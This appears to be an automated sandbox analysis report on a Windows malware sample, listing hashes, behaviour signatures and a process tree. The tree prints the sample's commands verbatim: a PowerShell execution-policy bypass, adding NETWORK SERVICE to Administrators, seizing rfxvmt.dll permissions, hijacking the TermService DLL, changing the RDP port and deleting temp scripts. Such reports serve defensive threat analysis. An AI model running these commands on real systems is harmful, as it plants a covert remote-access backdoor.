Analysis
-
max time kernel
6s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
-
submitted
22-12-2023 01:18
General
-
Target
43a5e55b1251affee0cf7494ac9c63b4.exe
-
Size
4.3MB
-
MD5
43a5e55b1251affee0cf7494ac9c63b4
-
SHA1
4a53bd2c188cf869b2a81b047940faf1ea03e1cb
-
SHA256
e2b372effc4c426a1e63d2629bd565eabeeaf042b9e0aea11701e09f42921a3c
-
SHA512
f1dde143fd0be1242a6d211770a60574929283e953262459f9898ac7822e0652aa7fe323fe1e3af36a6082587d36382e7e42d5a4dee74a111800027085e40343
-
SSDEEP
98304:pkucM0/VMuGOcsqLpBX1P3Xhm6SrnsQ2BUotyFoAqae:EM0/COsX1k6AnsFBUQyFoAq
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Possible privilege escalation attempt 8 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 16 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\43a5e55b1251affee0cf7494ac9c63b4.exe"C:\Users\Admin\AppData\Local\Temp\43a5e55b1251affee0cf7494ac9c63b4.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\car5-tg7.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES25AB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC259A.tmp"4⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add1⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr1⤵
-
C:\Windows\SysWOW64\net.exenet start rdpdr2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService1⤵
-
C:\Windows\SysWOW64\net.exenet start TermService2⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50bc316b88124442619532ea007bd7a5b
SHA155854867fcc11f9dfbb80b5d94347808a306b48d
SHA256e2da5ad6ba88af52a5433f1cf7c21b0760a2c90274a1764be32efa4882ea0fc2
SHA512f6cb2110e1bc35ff58f5d0e9724134d999dba6cfc295a8c481d33680a0c1a99075767113d82acfbea59b18b7776d1d1933788fdece541f5ba21504296d0926cb
-
Filesize
3KB
MD5b317d526a0ee0ac9d8ccdb320a59aa58
SHA1bcea8daddd2224bed2282597c1f6b4d985d95886
SHA256b58152dccb3b2a500ec007ba48c1d8fdf1b6f3f8bf03f5dca2db14f67e5b5511
SHA51295035cb30f8f76643c26160264d0006e349be16db0cd0a8d355c82f376b7e5375d00d3a9b154615c0398840ba6b40779f10104066cd8aae7616dbdbeee4a20a9
-
Filesize
7KB
MD558e4f3608379b302f5939c95327dceea
SHA13d9feb8585072b815b76307659431eced779df74
SHA2560e99c7ab88e99a0dcb46e675ddc903fc0d1f29b2afb004106beaba818eb61061
SHA5123f75887673105b63fca607e99ee7b517dc2148bed3ecdeb4d370b8c8e048904168543645586f4c0140a6509abd97c29e6576a17b9fcd68ad1c4d5be8af71bb4a
-
Filesize
19KB
MD568a381d9e9e25dafcd117f36b25f677a
SHA1186e7223b7181d6ad82000e6b888b7b859e7486c
SHA25649c248ddd20c5ecf3eb0be0b1ff69e9ec57d47e7d9106187aede6afc9f4ffca8
SHA5129ad3e2525ea37c22873ffddb67facb6a635037b1f3926e4a93db2b3e3d2ea0cb262bb1ed1afde087d074360ba1a90db144e7fce82abef0a2d59898a494a88d60
-
Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
Filesize
7KB
MD5ce73e10d416d8a4430248c32256fdc72
SHA14a501150b8b6f822d0553e439aceb1b4766dff4f
SHA2569ac9a375742ba87d0ef8a10c2975f7d01790757d8051e2bed9bfd9a7bb0500b3
SHA5125d5381b0258781720a7bc039e04e0ce4a65752db5c834ae272f345064f71c679b05afd9032f825cc839eaca04378776061daa8d421f40f79fabab2e4f7bb6456
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
652B
MD56d170dc8fffed91d71f5355ff619f154
SHA1308caccf2091aa204d2cb5138f08aab473ebba0b
SHA256bcbe2fcee76a6cd4e06d66ab6d71b6889598c4c1f9fa9d654851c8e574d5b625
SHA5123b01d8900564bb44723eecc772df9c2fb9143ec0875f84ac78f422635bb9db951a40fe5d715bab6249685e373e06cac49153fa442edfd0cba099a678558caa87
-
Filesize
424B
MD59f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
Filesize
309B
MD51efd4ccc016355c30be7932fcc9467dc
SHA17c71df0cfc9c3a2504b2538f4381eec805407fc0
SHA256309ad2e20dadc50b4cc7c14d286e2f14b4acf61b8dce3efe77e5d3694bb57c00
SHA51226a4fe8c7e33a771fa16d517d415353135327dad5e1494ec27df7157210db11a0e3d85890a96efb09034eda0fb7ef7bd308a274906bd818e24ebc2e56fa13f06
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
256KB
-
Filesize
6.9MB
-
Filesize
43.3MB
-
Filesize
4.0MB
-
Filesize
6.9MB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
4.0MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB